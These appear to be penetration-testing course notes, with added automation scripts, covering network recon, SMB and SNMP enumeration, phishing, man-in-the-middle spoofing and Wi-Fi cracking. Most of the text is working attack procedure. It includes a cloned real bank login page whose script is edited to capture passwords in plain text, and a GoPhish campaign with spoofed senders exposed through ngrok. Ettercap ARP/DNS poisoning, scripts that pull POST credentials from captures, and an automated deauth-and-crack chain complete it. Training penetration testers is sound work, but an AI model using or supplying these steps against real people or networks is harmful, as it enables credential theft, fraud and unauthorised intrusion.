- Use Maltego to perform OSINT investigation and analysis: "People Interest".
- Use Burp Suite to poke around: understand the app's logic & functionality, observe every HTTP request & response, and map the attack surface.
- Goal: understand all access points / attack surfaces & functionality of the system (HTTP headers, parameters, cookies, APIs, technology, usage patterns, etc).
- Ping scan only (-sn): discover live hosts, no port scanning. Pick only the targets that fall within scope.
nmap 192.168.100.0/24 -sn
nmap 192.168.100.* -sn
- Scan Top 10 TCP Ports
nmap 192.168.100.31 --top-ports=10
- Fast mode, only scan 100 most common ports
nmap -F -v 192.168.100.31
- Normal-scan, scan 1000 most common ports
nmap -v 192.168.100.31
- Scan all 65535 TCP ports
nmap -p- 192.168.100.31
- Operating System (OS) enumeration (needs root for raw packets). For speed, -Pn skips host discovery (treats every host as up, so the scan still runs when ICMP is filtered) and -n disables DNS resolution.
sudo nmap -O 192.168.100.31 -Pn -n
- Service version detection: enumerate all services & their versions on every TCP port. Again -Pn skips host discovery and -n disables DNS resolution.
nmap -p- -v -sV -Pn -n 192.168.100.31
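The five scans above are normally chained: sweep the range, parse the live hosts, port-scan only those, then version-scan only the ports found open. The script below is an added example (not from the original notes) that does exactly that and parses nmap's greppable (-oG) output with awk; the range 192.168.100.0/24, the output file names and the sample -oG text at the bottom are assumptions for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from these notes): chain the scans above so that the
# expensive -sV run only touches ports already found open.
#   1. -sn ping sweep of the range, greppable output (-oG)
#   2. parse the live hosts out of that file
#   3. default (top-1000) port scan of those hosts, -oG again
#   4. per host, -sV only against its open ports
# Range, file names and the sample output at the bottom are assumptions.
set -eu

# Print the IPs that nmap marked "Status: Up" in a -oG file, one per line.
live_hosts_from_gnmap() {
    awk '/Status: Up/ { print $2 }' "$1" | sort -u
}

# Print the open ports of one host as an nmap -p list ("21,22,80"), taken from
# the "Ports:" line of a -oG file. Each entry looks like 80/open/tcp//http///.
# Usage: open_ports_from_gnmap FILE HOST
open_ports_from_gnmap() {
    awk -v host="$2" '
        $1 == "Host:" && $2 == host && index($0, "Ports: ") {
            line = substr($0, index($0, "Ports: ") + 7)
            q = index(line, "Ignored State:")
            if (q) line = substr(line, 1, q - 1)
            n = split(line, entries, ", ")
            out = ""
            for (i = 1; i <= n; i++) {
                split(entries[i], f, "/")
                if (f[2] == "open") out = out (out == "" ? "" : ",") f[1]
            }
            print out
        }' "$1"
}

# Full workflow. Usage: recon_sweep 192.168.100.0/24 [output-prefix]
recon_sweep() {
    range="$1"; prefix="${2:-recon}"
    nmap -sn -n -oG "$prefix-sweep.gnmap" "$range" >/dev/null
    live_hosts_from_gnmap "$prefix-sweep.gnmap" > "$prefix-live.txt"
    echo "live hosts: $(wc -l < "$prefix-live.txt")"
    # top-1000 ports on the live hosts only; -Pn because we already know they are up
    nmap -Pn -n -iL "$prefix-live.txt" -oG "$prefix-ports.gnmap" >/dev/null
    while read -r host; do
        ports=$(open_ports_from_gnmap "$prefix-ports.gnmap" "$host")
        [ -n "$ports" ] || { echo "$host: no open ports in top 1000"; continue; }
        echo "$host: -sV on $ports"
        nmap -Pn -n -sV -p "$ports" -oN "$prefix-$host.txt" "$host" >/dev/null
    done < "$prefix-live.txt"
}

# Constructed sample of -oG output (not a real scan) to exercise the parsers;
# real nmap output separates the columns with tabs.
SAMPLE_GNMAP='# Nmap 7.94 scan initiated as: nmap -n -oG - 192.168.100.0/24
Host: 192.168.100.1 ()  Status: Up
Host: 192.168.100.31 ()  Status: Up
Host: 192.168.100.31 ()  Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 23/closed/tcp//telnet///, 80/open/tcp//http///  Ignored State: closed (996)
Host: 192.168.100.1 ()  Ports: 53/filtered/tcp//domain///  Ignored State: closed (999)'
```

Run `recon_sweep 192.168.100.0/24 lab` on the attacker box; the per-host `-sV` results land in `lab-<ip>.txt`. Swap the default scan for `-p-` in step 3 when the scope allows the extra time.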
- Banner Grabbing. Grab banner of an open port.
nc -nv 192.168.100.31 21
nc -nv 192.168.100.31 80
nmap -sV --script=banner -p21 10.10.10.0/24
- Remote Shell (RSH) service on default port 514 (trust is based on .rhosts / hosts.equiv, so try root first)
rsh -l root 192.168.100.31
- Remote Login Service (rlogin) on default port 513
rlogin -l root 192.168.100.31
msf > search rlogin
msf > use auxiliary/scanner/rservices/rlogin_login
msf auxiliary(scanner/rservices/rlogin_login) > set rhosts 192.168.100.31
msf auxiliary(scanner/rservices/rlogin_login) > set username root
msf auxiliary(scanner/rservices/rlogin_login) > exploit
- HTTP service enumeration on an IP
nmap --script=http-enum 192.168.100.31 -p80,8081
- FTP service enumeration
nmap -sC -sV -p21 192.168.100.31
ftp -p 192.168.100.31
- SMB service enumeration
nmap --script smb-os-discovery.nse -p445 192.168.100.31
nmap -A -p445 192.168.100.31
- List SMB Shares
smbclient -N -L \\\\192.168.100.31
- Connect to an SMB share
smbclient \\\\192.168.100.31\\users
ls
NT_STATUS_ACCESS_DENIED listing \*
exit
smbclient -U bob \\\\192.168.100.31\\users
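Instead of trying shares one by one, the added example below (not from the original notes) parses the share table that `smbclient -N -L` prints and attempts a null-session `ls` on each Disk share, so readable and denied shares are sorted out in one pass. The host and the sample listing are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from these notes): parse the share table that
# `smbclient -N -L HOST` prints and try a null-session `ls` on every Disk
# share. Host and the sample listing below are assumptions for illustration.
set -eu

# Print the names of Disk shares from a saved `smbclient -L` listing.
# The table starts at the "Sharename  Type  Comment" header, has a dashed
# underline, and ends at the first blank line. IPC$ and printers are skipped
# because they cannot be listed with ls.
disk_shares_from_listing() {
    awk '
        /Sharename/ && /Type/ && /Comment/ { in_table = 1; next }
        in_table && $1 ~ /^-+$/ { next }
        in_table && NF == 0 { exit }
        in_table && $2 == "Disk" { print $1 }
    ' "$1"
}

# Null-session probe of every Disk share on a host.
# Usage: probe_anonymous_shares 192.168.100.31
probe_anonymous_shares() {
    host="$1"
    listing=$(mktemp)
    smbclient -N -L "$host" > "$listing" 2>&1 || true
    disk_shares_from_listing "$listing" | while read -r share; do
        if smbclient -N "//$host/$share" -c 'ls' >/dev/null 2>&1; then
            echo "$share: anonymous listing OK  (smbclient -N //$host/$share)"
        else
            echo "$share: denied, retry with credentials (smbclient -U user //$host/$share)"
        fi
    done
    rm -f "$listing"
}

# Constructed `smbclient -N -L` output (not a real host) to exercise the parser.
SAMPLE_LISTING='
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        users           Disk

Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.100.31 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available'
```

`smbclient` accepts `//host/share` as well as the `\\\\host\\share` form used above, which avoids the backslash escaping when the share name comes from a variable.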
- SNMP service enumeration (UDP 161). v2c with the default community strings "public" / "private"; OID 1.3.6.1.2.1.1.5.0 is sysName.
snmpwalk -v 2c -c public 192.168.100.31 1.3.6.1.2.1.1.5.0
snmpwalk -v 2c -c private 192.168.100.31
- Brute force the SNMP community string
onesixtyone -c dict.txt 192.168.100.31
- Default Nmap Scripting Engine (NSE) scanning
# Default: -sC or --script=default
nmap -sC 192.168.100.31
# Scripts only run against the ports the scan found open (here just 445)
nmap -sC -p445 192.168.100.31
# To run a specific script or category (quote wildcards so the shell does not glob them)
nmap --script=http-enum -p80 192.168.100.31
nmap --script="http-*" -p80 192.168.100.31
nmap --script=banner -p22,23 192.168.100.31
# Aggressive scan (-A): service/version detection, OS detection, traceroute and the default scripts against the target.
nmap -p 80 -A 192.168.100.31
- Nmap Scripting Engine (NSE) - Vuln Category
# NSE location
ls /usr/share/nmap/scripts
# Uses all related scripts from vuln category to see what vulnerabilities we can find
nmap -p 80 -sV --script vuln 192.168.100.31
# Uses specific vuln script
nmap -p 21 -sV --script ftp-vsftpd-backdoor 192.168.100.31
- Attacking the User. The art of Human Hacking. Using SET and GoPhish.
# The Social-Engineering Toolkit (SET)
## Credential Harvester Attack
sudo setoolkit
set> 1) Social-Engineering Attacks
set> 2) Website Attack Vectors
set> 3) Credential Harvester Attack Method
# Case 0: just use a default SET template, e.g. the Google web phishing page
set> 1) Web Templates
set> IP address listener: your-kali-ip
set> 2. Google
# Case 1: clone a site, no config change needed
set> 2) Site Cloner
set> IP Address listener: your-kali-ip
set> Enter the url to clone: http://testphp.vulnweb.com/login.php
# Case 2: needs config: switch SET's web server to Apache so the phishing page files can be edited in Apache's default path /var/www/html/
sudo sed -i 's/^APACHE_SERVER=OFF/APACHE_SERVER=ON/' /etc/setoolkit/set.config
set> 2) Site Cloner
set> IP Address listener: your-kali-ip
set> Enter the url to clone: https://ibank.klikbca.com
- Phishing email simulation (phishing assessment). Requirement: 2FA must be enabled on the Google account before Google's SMTP service can be used to send the phishing email.
# Steps to set up MFA on Google and obtain an SMTP (app) password
- open Google, click the top-right corner
- click "Manage your Google Account > Security > 2-Step Verification > Add phone number / Authenticator"
# Steps to get the Google SMTP service password
- open: https://myaccount.google.com/apppasswords
- enter an app name, copy the generated password to use as the SMTP password.
# Phishing assessment using SET: Mass Mailer Attack
# NOTE: THE LAST TIME I TRIED THIS IT NO LONGER WORKED; IT SEEMS EVEN AN EMPTY FILE (NOT MALWARE) STILL GETS BLOCKED BY GOOGLE, SKIP FOR NOW.
touch /home/kali/update.exe
sudo setoolkit
set> 1) Social-Engineering Attacks
set> 5) Mass Mailer Attack
set> 1. E-Mail Attack Single Email Address
set> 1. Pre-Defined Template
set> 1. New Update
set> Send Email to: [email protected]
set> 1. Use a gmail Account for your email attack.
set> Your gmail email address: [email protected]
set:phishing> The FROM NAME the user will see: Administrator
Email password:
set:phishing> Flag this message/s as high priority? [yes|no]: no
Do you want to attach a file - [y/n]: y
The path of file: /home/kali/update.exe
Do you want to attach an inline file - [y/n]: n
[*] SET has finished sending the emails
# Phishing assessment using GoPhish
## If using Kali Linux:
sudo sed -i -e "s/127\.0\.0\.1:3333/0\.0\.0\.0:3333/g" /etc/gophish/config.json
gophish
# open the web UI at https://your-kali-linux-ip:3333
https://192.168.56.16:3333/
# Default credentials:
# Username: admin
# Password: kali-gophish
# To stop it: gophish-stop
## If using other Linux distro:
mkdir gophish && cd gophish
wget --no-check-certificate -O gophish.zip https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
sudo apt install -y unzip
unzip gophish.zip && rm gophish.zip
sed -i -e "s/127\.0\.0\.1:3333/0\.0\.0\.0:3333/g" config.json
chmod +x gophish
./gophish
# Browse to https://localhost:3333
# See the logs for default credentials
# If after starting GoPhish the browser says "Unable to connect", make sure port 80 is not already used by another service (open); check with nmap:
nmap -p80 -sV localhost
# If it is in use (open), find which service holds it and stop it. E.g. Apache2:
service apache2 stop
- Sending Profiles
# Name: Gmail SMTP Server
# SMTP From: [email protected]
# Host: smtp.gmail.com:587
# Username: [email protected]
- Landing Pages
# Import Site: https://ibank.klikbca.com
# Edit the page script: in the "var enkrip" part remove the encryption so the password is captured in plain text:
var enkrip = document.getElementById("txt_pswd").value;
# Tick Capture Submitted Data & Capture Passwords
# Redirect to: https://ibank.klikbca.com
- Email Templates
# Create the email template (KlikBCA) with Grok AI, example prompt: "create gophish email templates for klikbca.com phishing campaign"
# example: https://x.com/i/grok/share/9E14wo6WaBOuBOicnoiJjjFzR
# Name: KlikBCA Account Security Verification
# Envelope Sender: KlikBCA <[email protected]>
# Subject: Verifikasi Keamanan Akun KlikBCA Anda
# Edit the logo part of the template:
<img src="https://www.klikbca.com/images/top_BCA1.jpg" alt="KlikBCA Logo" width="150">
# Example 2, from Import Email:
# pick one Google email with the subject "Notifikasi keamanan" (security notification)
# right-click the email > "Show original" > Copy to clipboard
# Name: Import Email
# Click "Import Email" > paste the clipboard
# Envelope Sender: Google <[email protected]>
# Subject: Notifikasi keamanan
- Users & Groups
# Add New Group, enter the victims' emails and their particular details.
- Campaigns
# New Campaign
# Name: KlikBCA Campaign
# Attacker / Gophish Server URL (use HTTP not HTTPS!): http://192.168.88.132
# Sending Profile: Gmail SMTP Server
- Email spoofing simulation in a phishing assessment (GoPhish + MailHog)
mkdir mailhog && cd mailhog
wget https://github.com/mailhog/MailHog/releases/download/v1.0.1/MailHog_linux_amd64
chmod +x MailHog_linux_amd64
sudo ./MailHog_linux_amd64
# Mail Inbox: http://localhost:8025/
# The new SMTP port: 1025
# Change Config on GoPhish:
- Edit Sending Profile
# SMTP From: KlikBCA <[email protected]>
# Host: localhost:1025
# Username & Password: leave empty
- Edit Email Template
# Envelope sender: KlikBCA <[email protected]>
- Launch New Campaign!
- [ ] (Bonus) Use ngrok to expose localhost to the internet
# Sign up & download: ngrok.com
mkdir ngrok && cd ngrok
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
sudo tar -xvzf ngrok-v3-stable-linux-amd64.tgz -C /usr/local/bin
ngrok config add-authtoken {{YOUR-AUTH-TOKEN}}
ngrok http http://localhost
# Change in GoPhish > New Campaign > URL: the URL generated by ngrok, e.g. https://158a-2001-448a-1001-64ec-9c37-ff83-d99e-ad3.ngrok-free.app
- System Hacking using Metasploit
- Web Hacking Using Burp Suite
- Wireless Hacking: Setup Driver & Quick Win using Wifite
# Setup Wireless External Adapter
# Setting virtualbox
Setting -> USB -> USB 2.0
# Check the adapter
(On Virtualbox: Device -> USB -> Check Adapter)
lsusb
ip link
ip a
iwconfig
# update the repo first
sudo apt update
# If apt update error on signature verification (https://forums.kali.org/t/apt-update-gpg-missing-key-error/7563), do this: sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
# Install the driver & reboot for TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS] (v1 needs no driver install)
# This driver enables monitor mode and packet injection
sudo apt install -y realtek-rtl8188eus-dkms
reboot
# Set the adapter into Monitor Mode
sudo ifconfig wlan0 down
sudo iw wlan0 set monitor control
sudo ifconfig wlan0 up
iwconfig
# Revert to managed mode
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode managed
sudo ifconfig wlan0 up
# Test Packet Capture and see on wireshark
Open Wireshark
sudo aireplay-ng --test wlan0
## Is there any traffic indicator on wlan0? If aireplay-ng captures/injects zero (0) packets, something is wrong with the Wi-Fi device. Just uncheck & re-check it (on VirtualBox: Device -> USB -> uncheck & re-check the adapter)
# If the only problem is an interfering process, check & kill it:
sudo airmon-ng check
sudo airmon-ng check kill
# Wifite captures the handshake of every client that newly joins the Wi-Fi, and clients that re-join after being kicked off automatically (deauth attack) are captured automatically into its .pcap file.
sudo wifite --kill
- Network Hacking: The Classic MITM (ARP & DNS Spoofing) using Ettercap & Wireshark
# MITM requirement: enable ip_forward so the attacker's kernel forwards the victim's traffic on to the gateway (otherwise the victim loses connectivity and notices). Wireshark only captures; it does not forward.
cat /proc/sys/net/ipv4/ip_forward
sudo su
echo 1 > /proc/sys/net/ipv4/ip_forward
# ARP Spoofing with Ettercap
open the ettercap GUI
pick the target interface > click Accept to start unified sniffing
click Scan for hosts
Add Target 1 (victim), Add Target 2 (router/default gateway)
click MITM menu > ARP poisoning
Open Wireshark to check whether packets are being captured
# POST request credential harvesting in Wireshark
# test a login on an HTTP (not HTTPS) web login; if it errors after submit, just resubmit
# check in Wireshark with the filter:
http.request.method==POST
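The same filter can be run from the command line so the submitted form fields come out as text instead of being read off the packet bytes. The script below is an added example, not from the original notes; it drives tshark with field names from Wireshark's urlencoded-form dissector and formats the result with awk. The pcap path, the IPs and the sample line are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from these notes): pull submitted form fields out of a
# capture. tshark applies the same display filter as above and prints one
# line per POST; the awk step splits the form keys/values into "field=value".
# The pcap path and the constructed sample line are assumptions.
# Field names come from Wireshark's urlencoded-form dissector; if a tshark
# build lacks them, swap in -e http.file_data to get the raw body instead.
set -eu

# Dump every HTTP POST in a pcap as tab-separated columns:
# src ip, dst ip, host, uri, form keys (comma joined), form values (comma joined)
dump_posts() {
    tshark -r "$1" -Y 'http.request.method == "POST"' \
        -T fields -E header=n -E separator=/t -E aggregator=, \
        -e ip.src -e ip.dst -e http.host -e http.request.uri \
        -e urlencoded-form.key -e urlencoded-form.value
}

# Turn the tab-separated lines into "src -> host/uri key=value", one per field.
# A value that itself contains a comma would be mis-split; change the
# aggregator above in that case.
format_post_creds() {
    awk -F '\t' '
        NF >= 6 {
            n = split($5, k, ",")
            split($6, v, ",")
            for (i = 1; i <= n; i++)
                printf "%s -> %s%s %s=%s\n", $1, $3, $4, k[i], v[i]
        }'
}

# Usage: harvest_posts capture.pcapng
harvest_posts() {
    dump_posts "$1" | format_post_creds
}

# Constructed tshark output line (not from a real capture) for the formatter.
SAMPLE_POST_LINE=$(printf '192.168.100.9\t192.168.100.31\ttestphp.vulnweb.com\t/login.php\tuname,pass\tbob,hunter2')
```

Save the Wireshark session to a file first (File > Save As) and run `harvest_posts capture.pcapng`; only plaintext HTTP logins show up, which is the point of the ARP MITM: HTTPS traffic stays opaque.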
# DNS spoofing requirements:
Prepare a phishing website, e.g. a fake Google site with setoolkit
# Change the ettercap config so it can spoof DNS; fill in the IP where the fake Google site is running (the attacker)
sudo mousepad /etc/ettercap/etter.conf
# Change both of these lines to 0
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
# Uncomment the redir_command_* lines (and their IPv6 variants) under:
#---------------
# Linux
#---------------
sudo mousepad /etc/ettercap/etter.dns
# each entry must resolve to the attacker IP hosting the fake site (adjust the example IPs to your lab)
google.com A 192.168.100.1
*.google.com A 192.168.100.9
# Launch DNS spoofing/poisoning with the Ettercap GUI
open the ettercap GUI
pick the target interface > click Accept to start unified sniffing
Stop unified sniffing
click Scan for hosts
Add Target 1 (router/default gateway), Add Target 2 (victim)
click MITM menu > ARP poisoning
click Plugins > Manage plugins > tick dns_spoof
Start unified sniffing
# If the GUI crashes, use the Ettercap CLI instead (-T text UI, -q quiet, -M arp:remote poisons both directions, -P loads the plugin):
sudo ettercap -T -q -i eth1 -M arp:remote /192.168.100.1// /192.168.100.9// -P dns_spoof
# Flush the DNS cache on the victim (Windows cmd) so it resolves again:
ipconfig /flushdns
- Wireless Hacking: The Classic Wi-Fi Attacks using the Aircrack-ng suite
# Airmon-NG 101
# Start monitoring mode using airmon-ng
sudo airmon-ng start wlan0
iwconfig
# Test Packet Capture and see on wireshark
Open Wireshark
sudo aireplay-ng --test wlan0
## Is there any traffic indicator on wlan0? If aireplay-ng captures/injects zero (0) packets, something is wrong with the Wi-Fi device. Just uncheck & re-check it (on VirtualBox: Device -> USB -> uncheck & re-check the adapter)
# If the only problem is an interfering process, check & kill it:
sudo airmon-ng check
sudo airmon-ng check kill
# Scan on-demand / live capturing all the wireless access points using airodump-ng and note the "channel" of BSSID target
sudo airodump-ng wlan0
# Scan and save the output to files with the prefix "cyber" (airodump-ng writes cyber-01.cap, cyber-01.csv, ...); the .cap is what gets cracked.
## -c = channel of the access point / BSSID target, to narrow down the traffic capture. -w = prefix of the captured files
sudo airodump-ng wlan0 -c 11 -w cyber
## Deauth attack to force the victim to re-join and capture the EAPOL 4-way handshake, which is then cracked with aircrack-ng.
## --deauth 5 = the number of deauths to send, -a = Access Point / BSSID target, -c = MAC address of client that will be de-auth attacked
sudo aireplay-ng --deauth 5 -a DA:CF:DB:29:F7:7E -c E8:B1:FC:F3:AF:20 wlan0
# Crack the .pcap file from airodump-ng
aircrack-ng cyber-01.cap -w /usr/share/wordlists/wifite.txt
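Putting the survey, deauth and crack together: the added example below (not from the original notes) reads the CSV that airodump-ng writes alongside the .cap to find the target's BSSID, channel and associated clients, then runs the capture, deauth and aircrack-ng steps with those values instead of hand-copied MACs. The interface name, the ESSID "cyber", the wordlist path and the sample CSV are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from these notes): the airodump-ng -> aireplay-ng ->
# aircrack-ng chain above, driven from the CSV airodump-ng writes next to the
# .cap (prefix-01.csv). Interface, ESSID, wordlist and the sample CSV are
# assumptions. Run as root with the interface already in monitor mode.
set -eu

# airodump CSV layout, AP section: BSSID, First time seen, Last time seen,
# channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV,
# LAN IP, ID-length, ESSID, Key. The station section follows a blank line and
# starts with a "Station MAC" header: Station MAC, First, Last, Power,
# # packets, BSSID, Probed ESSIDs. Fields are padded with spaces, so trim them.

# Print "BSSID CHANNEL" of the access point with the given ESSID.
# Usage: ap_for_essid FILE.csv ESSID
ap_for_essid() {
    awk -F ',' -v essid="$2" '
        function trim(s) { gsub(/^ +| +$/, "", s); return s }
        /^Station MAC/ { exit }
        NF >= 14 && trim($14) == essid { print trim($1), trim($4); exit }
    ' "$1"
}

# Print the station MACs associated with the given BSSID, one per line.
# Usage: clients_for_bssid FILE.csv BSSID
clients_for_bssid() {
    awk -F ',' -v bssid="$2" '
        function trim(s) { gsub(/^ +| +$/, "", s); return s }
        /^Station MAC/ { in_clients = 1; next }
        in_clients && NF >= 6 && trim($6) == bssid { print trim($1) }
    ' "$1"
}

# Usage: capture_and_crack wlan0 cyber /usr/share/wordlists/wifite.txt [prefix]
capture_and_crack() {
    iface="$1"; essid="$2"; wordlist="$3"; prefix="${4:-cyber}"
    # 1. short survey on all channels to learn BSSID + channel of the target
    timeout 20 airodump-ng -w "$prefix-survey" --output-format csv "$iface" >/dev/null 2>&1 || true
    set -- $(ap_for_essid "$prefix-survey-01.csv" "$essid")
    bssid="${1:-}"; channel="${2:-}"
    [ -n "$bssid" ] || { echo "ESSID $essid not seen during survey"; return 1; }
    # 2. lock on that channel and BSSID, write the handshake capture in the background
    airodump-ng -c "$channel" --bssid "$bssid" -w "$prefix" "$iface" >/dev/null 2>&1 &
    dump_pid=$!
    sleep 15
    # 3. deauth each associated client so it re-joins and sends the EAPOL 4-way handshake
    clients_for_bssid "$prefix-01.csv" "$bssid" | while read -r client; do
        aireplay-ng --deauth 5 -a "$bssid" -c "$client" "$iface" >/dev/null 2>&1 || true
    done
    sleep 30
    kill "$dump_pid" 2>/dev/null || true
    # 4. crack the PSK offline; -b selects the network inside the .cap
    aircrack-ng -b "$bssid" -w "$wordlist" "$prefix-01.cap"
}

# Constructed airodump-ng CSV (not a real survey) to exercise the parsers.
SAMPLE_AIRODUMP_CSV='
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
DA:CF:DB:29:F7:7E, 2024-05-01 10:00:00, 2024-05-01 10:05:00, 11, 130, WPA2, CCMP, PSK, -45, 120, 0, 0.  0.  0.  0, 5, cyber,
AA:BB:CC:DD:EE:01, 2024-05-01 10:00:00, 2024-05-01 10:05:00, 6, 54, WPA2, CCMP, PSK, -70, 40, 0, 0.  0.  0.  0, 8, guest-ap,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
E8:B1:FC:F3:AF:20, 2024-05-01 10:01:00, 2024-05-01 10:05:00, -50, 30, DA:CF:DB:29:F7:7E, cyber
11:22:33:44:55:66, 2024-05-01 10:02:00, 2024-05-01 10:04:00, -80, 3, (not associated),
'
```

If airmon-ng renamed the interface (e.g. to wlan0mon), pass that name as the first argument; the deauth only helps when at least one station is associated, which is why the client list is taken from the live CSV rather than guessed.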
- Privilege Escalation
- Reporting and Mitigation